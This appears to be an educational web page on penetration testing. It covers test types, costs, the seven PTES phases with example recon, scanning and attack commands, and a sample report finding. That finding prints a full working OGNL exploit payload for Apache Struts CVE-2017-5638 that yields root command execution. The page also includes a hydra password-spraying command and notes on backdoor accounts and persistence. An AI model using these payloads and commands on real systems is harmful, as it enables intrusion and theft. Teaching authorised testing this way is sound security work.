Penetration Testing
Checking access...
Penetration testing (pen testing) is the authorised, simulated attack on a system to evaluate its security. Unlike vulnerability scanning (automated, broad), pen testing is manual, deep, and focused on demonstrating business impact.
Testing Types
By Knowledge Level
| Type | Knowledge Given | Simulates | Depth | Best For |
|---|---|---|---|---|
| Black box | Nothing (just a domain name or IP range) | External attacker with no inside knowledge | Low-Medium | External perimeter testing |
| Grey box | Limited credentials, architecture docs | Compromised insider or contractor | Medium-High | Internal network, web app testing |
| White box | Full access: source code, credentials, architecture, configs | Internal audit, developer review | Highest | Code review, cryptography review, complex logic |
By Target
| Target | Focus | Typical Duration | Typical Cost |
|---|---|---|---|
| External network | Perimeter defences, exposed services | 1-2 weeks | $10k-$30k |
| Internal network | Lateral movement, privilege escalation | 1-2 weeks | $15k-$40k |
| Web application | OWASP Top 10, business logic flaws | 2-4 weeks | $20k-$60k |
| Mobile app | API security, local storage, reverse engineering | 1-3 weeks | $15k-$50k |
| Cloud | IAM misconfigurations, data exposure | 1-2 weeks | $15k-$30k |
| Physical | Physical access controls, tailgating | 1-5 days | $5k-$20k |
| Social engineering | Phishing, pretexting, vishing | 1-2 weeks | $10k-$20k |
Penetration Testing Execution Standard (PTES)
PTES defines seven phases of a penetration test:
Phase 1: Pre-engagement Interactions
Everything before testing begins:
SCOPE AGREEMENT:- Target IPs/domains: 203.0.113.0/24, *.example.com- In-scope systems: Production web servers, API endpoints- Out-of-scope: Database servers, backup systems, SCADA- Testing window: 9 PM - 5 AM (maintenance window)- Excluded attacks: DDoS, physical destruction, social engineering of support staff
RULES OF ENGAGEMENT:- No destructive actions without prior approval- No exfiltration of real customer data (use synthetic data markers)- Provide emergency contact numbers (in case of accidental service disruption)- Third-party notification: will we notify cloud providers? (AWS, Azure)Phase 2: Intelligence Gathering (Reconnaissance)
Passive and active information gathering:
# Passive reconnaissancewhois example.comdig any example.comdig mx example.comdig ns example.com
# Subdomain enumerationsublist3r -d example.comamass enum -d example.com
# Technology fingerprintingwhatweb example.comwappalyzer https://example.com
# Shodan searchshodan search hostname:example.comshodan search org:"Example Corp"
# Certificate transparencycurl -s "https://crt.sh/?q=%25.example.com&output=json" | jq '.[].name_value'Phase 3: Threat Modelling
Identify what matters most and what attacks are most likely:
| Asset | Threat | Attack Vector | Likelihood | Impact |
|---|---|---|---|---|
| Customer database | Data theft | SQL injection, compromised credentials | Medium | Critical |
| Payment system | Fraud | API abuse, MITM | Low | Critical |
| Admin panel | Full compromise | Weak authentication, session hijacking | Medium | Critical |
| Public website | Defacement | Unpatched CMS, XSS | High | Low |
Phase 4: Vulnerability Analysis
Automated scanning combined with manual verification:
# Network scanningnmap -sV -sC -p- -oA nmap_scan 203.0.113.0/24
# Web application scanning (automated + manual)zap-cli quick-scan --spider -l https://example.comnikto -h https://example.com
# Manual verification: for each automated finding# - Confirm false positive / true positive# - Determine if the finding is exploitable# - Assess the business impact of exploitationPhase 5: Exploitation
Attempt to exploit vulnerabilities to demonstrate impact:
# SQL injection demonstrationsqlmap -u "https://example.com/page?id=1" --batch --banner
# Attempt privilege escalation# Linux: kernel exploits, sudo misconfigurations, SUID binaries# Windows: unquoted service paths, vulnerable drivers, token manipulation
# Password sprayinghydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.100
# Lateral movement# CrackMapExec, Mimikatz, BloodHound, PowerShell remotingPhase 6: Post-Exploitation
After gaining access, demonstrate the maximum business impact:
# What can we access from this position?# Enumerate network shares, databases, cloud consoles
# Can we pivot to more critical systems?# BloodHound: find privilege escalation paths in Active Directory
# What data can we exfiltrate?# Locate and access PII, financial data, intellectual property
# Can we achieve persistence?# Backdoor accounts, SSH keys, scheduled tasksPhase 7: Reporting
The report is the only deliverable the client receives. A poor report undermines the entire test:
EXECUTIVE SUMMARY (1-2 pages):- High-level overview for non-technical leadership- Key findings in business context- Risk rating and remediation priority- No technical jargon
TECHNICAL REPORT:- Finding details with CVSS scores- Step-by-step reproduction instructions- Screenshots of each finding- Proof-of-concept code (if applicable)- Remediation guidance
APPENDICES:- Scope and rules of engagement- Tools used- Raw scan data- Excluded findings (false positives, out-of-scope)Sample Finding
Finding #1: Remote Code Execution via Unpatched Apache Struts (CVE-2017-5638)Severity: Critical (CVSS 10.0)Asset: https://example.com (203.0.113.50)
Description:The Apache Struts framework on the target server is running version2.3.32 which is vulnerable to CVE-2017-5638. This vulnerability allowsunauthenticated remote code execution through specially craftedContent-Type headers.
Reproduction:1. Navigate to https://example.com/login.action2. Intercept the request with Burp Suite3. Send the following request: GET /login.action HTTP/1.1 Host: example.com Content-Type: %{(#_='multi_part_name').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2. ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2. ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil. getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id'). (#cmds=@java.lang.Runtime@getRuntime().exec(#cmd)).(#iswin=@java.lang.System@ getProperty('os.name').toLowerCase().contains('win')).(#cmds=(#iswin?{'cmd.exe','/c', #cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p. redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2. ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons. io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
4. The response contains: uid=0(root) gid=0(root) groups=0(root)
Impact:Full remote code execution as root on the production web server.An attacker could install a webshell, pivot to internal networks,access the customer database, and exfiltrate PII.
Remediation:Upgrade Apache Struts to version 2.5.12 or later immediately.Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638OWASP Testing Guide
The OWASP Web Security Testing Guide (WSTG) provides a comprehensive framework for web application testing:
| Module | Tests | Business Risk |
|---|---|---|
| Information Gathering | Search engine discovery, fingerprinting, robots.txt review | Exposure of sensitive information |
| Authentication Testing | Credential transport, enumeration, brute force, weak password policy | Account takeover |
| Session Management Testing | Cookie attributes, session fixation, CSRF | Session hijacking |
| Authorisation Testing | Path traversal, privilege escalation, IDOR | Unauthorised data access |
| Input Validation Testing | SQL injection, XSS, command injection, file upload | Data breach, RCE |
| Business Logic Testing | Workflow bypass, race conditions, excessive data exposure | Financial fraud |
When to Pen Test vs Vulnerability Scan
| Factor | Vulnerability Scan | Penetration Test |
|---|---|---|
| Frequency | Weekly to monthly | Annually or per major change |
| Cost | Low ($1k-$5k/year) | High ($10k-$100k+) |
| Coverage | Broad (all known CVEs) | Deep (specific attack paths) |
| False positives | Higher | Lower (manual verification) |
| Business impact | Shows WHAT is vulnerable | Shows SO WHAT if exploited |
| Regulatory requirement | PCI DSS, HIPAA (quarterly) | PCI DSS (annual), SOC 2 |
Tip
Run vulnerability scans monthly. Run penetration tests annually. But never run a pen test without first having run a vulnerability scan — you waste the pen tester’s time (and your money) asking them to find CVEs an automated scanner would have found for $50.
Key Takeaways
- Penetration testing is manual, deep, and focused on demonstrating business impact — it complements but does not replace vulnerability scanning
- PTES defines seven phases from pre-engagement to reporting — follow a standardised methodology for consistency and defensibility
- Test types (black, grey, white box) offer different trade-offs between realism and depth — choose based on your specific threat model
- The report is the only deliverable — invest as much in clear, actionable reporting as in technical exploitation
- Vulnerability scans are for frequency (monthly); pen tests are for depth (annually) — run both as part of a comprehensive program